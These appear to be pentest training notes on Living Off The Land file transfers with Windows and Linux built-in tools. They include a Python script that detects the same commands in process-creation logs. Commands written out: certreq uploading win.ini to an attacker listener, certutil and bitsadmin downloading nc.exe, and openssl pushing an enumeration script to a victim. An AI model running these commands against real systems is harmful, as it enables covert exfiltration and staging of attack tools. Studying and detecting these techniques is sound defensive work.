Living Off The Land - using legitimate, system-present tools so that the following activities blend in with regular system activity:

  • Download

  • Upload

  • Command Execution

  • File Read

  • File Write

  • Bypasses

  • Privilege escalation

  • LOLBAS

    • documents every binary, script and library that can be used for Living Off The Land techniques in Windows
    • filters: /upload, /download etc.
  • GTFOBins

    • the same, but for Linux
    • filters: +file download etc.

CertReq.exe

certreq -Post sends the given file as the body of an HTTP POST to the -config URL, so a plain listener receives its contents. The timeout error on the victim is expected: nc never sends an HTTP response.

# Victim
certreq.exe -Post -config http://IP:8000/ c:\windows\win.ini
Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)

# Kali
sudo nc -lvnp 8000

listening on [any] 8000 ...
connect to [IP] from (UNKNOWN) [IP_2] 53819
POST / HTTP/1.1
# ...
Host: IP:8000

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

openssl

# Kali
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Generating a RSA private key
#...
writing new private key to 'key.pem'
#...
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

File transfer

# Kali
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

# Victim
openssl s_client -connect IP:80 -quiet > LinEnum.sh

certutil.exe

# download a file
certutil.exe -verifyctl -split -f http://IP:8000/nc.exe

bitsadmin.exe

The Background Intelligent Transfer Service (BITS) can download files over HTTP or SMB.

bitsadmin /transfer wcb /priority foreground http://IP:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

BITS can also be driven from PowerShell through the BitsTransfer module:

Import-Module bitstransfer; Start-BitsTransfer -Source "http://IP:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
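Every transfer on this page (certreq -Post, certutil -verifyctl, bitsadmin /transfer, Start-BitsTransfer, openssl s_client) leaves a process-creation record whose command line is the most reliable place to catch it. The following is an added detection example, not code from the original notes: it runs argument-level rules over constructed records shaped like Sysmon Event ID 1 (the Image and CommandLine field names, the hostnames, paths and the 10.0.0.5 listener address are all assumed for the example), and it deliberately includes benign uses of the same binaries so the rules are checked against false positives as well.

```python
import re
from dataclasses import dataclass

# Constructed sample records shaped like Sysmon Event ID 1 (process creation).
# Paths and the 10.0.0.5 listener address are made up for this example.
EVENTS = [
    {"Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r"certreq.exe -Post -config http://10.0.0.5:8000/ c:\windows\win.ini"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verifyctl -split -f http://10.0.0.5:8000/nc.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer wcb /priority foreground http://10.0.0.5:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "Import-Module bitstransfer; Start-BitsTransfer -Source http://10.0.0.5:8000/nc.exe -Destination C:\Windows\Temp\nc.exe"'},
    {"Image": "/usr/bin/openssl",
     "CommandLine": "openssl s_client -connect 10.0.0.5:80 -quiet"},
    # Benign uses of the same binaries: these must not fire.
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Windows\System32\cmd.exe SHA256"},
    {"Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r"certreq.exe -new request.inf request.req"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /list /allusers"},
]

URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)   # http(s)/ftp source
UNC_RE = re.compile(r"\\\\[^\\\s]+\\\S+")                        # \\server\share source
TOKEN_RE = re.compile(r'"[^"]*"|\S+')                            # keep quoted args whole


@dataclass(frozen=True)
class Finding:
    rule: str
    confidence: str
    image: str
    command_line: str


def tokenize(command_line):
    """Split a command line into tokens, keeping quoted arguments together."""
    return TOKEN_RE.findall(command_line)


def flags(tokens):
    """Normalise switches so '-Post', '/post' and 'POST' all become 'post'."""
    return {t.lstrip("-/").lower() for t in tokens}


def has_remote_source(command_line):
    """True if the command line references an http(s)/ftp URL or a UNC path."""
    return bool(URL_RE.search(command_line) or UNC_RE.search(command_line))


def basename(image):
    """Executable name from a Windows or Unix path, lower-cased."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Return the findings for one process-creation record."""
    image = basename(event["Image"])
    cmd = event["CommandLine"]
    tokens = tokenize(cmd)
    f = flags(tokens)
    remote = has_remote_source(cmd)
    found = []

    def hit(rule, confidence):
        found.append(Finding(rule, confidence, event["Image"], cmd))

    # certreq -Post -config <url> <file> ships the file's contents in an HTTP POST body.
    if image == "certreq.exe" and {"post", "config"} <= f and remote:
        hit("certreq-http-upload", "high")
    # certutil -verifyctl / -urlcache fetch a remote object; -split writes it to disk.
    if image == "certutil.exe" and f & {"verifyctl", "urlcache"} and remote:
        hit("certutil-download", "high")
    # bitsadmin /transfer <job> <url> <localpath>
    if image == "bitsadmin.exe" and "transfer" in f and remote:
        hit("bitsadmin-transfer", "high")
    # Start-BitsTransfer on a PowerShell command line with a remote -Source.
    if image in ("powershell.exe", "pwsh.exe") and "start-bitstransfer" in cmd.lower() and remote:
        hit("bits-powershell-transfer", "high")
    # openssl s_client is routine admin work; the shell redirect that turns it into a
    # file transfer is not visible here, so this is only a lead to correlate with the peer.
    if image == "openssl" and "s_client" in tokens and "connect" in f:
        hit("openssl-s_client-connect", "low")
    return found


def scan(events):
    """Run analyze() over a list of records and flatten the findings."""
    findings = []
    for ev in events:
        findings.extend(analyze(ev))
    return findings


if __name__ == "__main__":
    for fd in scan(EVENTS):
        print(f"[{fd.confidence}] {fd.rule}: {fd.command_line}")
```

The rules key on arguments rather than on the binary name alone because certutil, certreq and bitsadmin are all used legitimately on a healthy host; the two benign certutil and certreq records and the bitsadmin /list record produce no finding, while each of the page's five transfer commands is flagged.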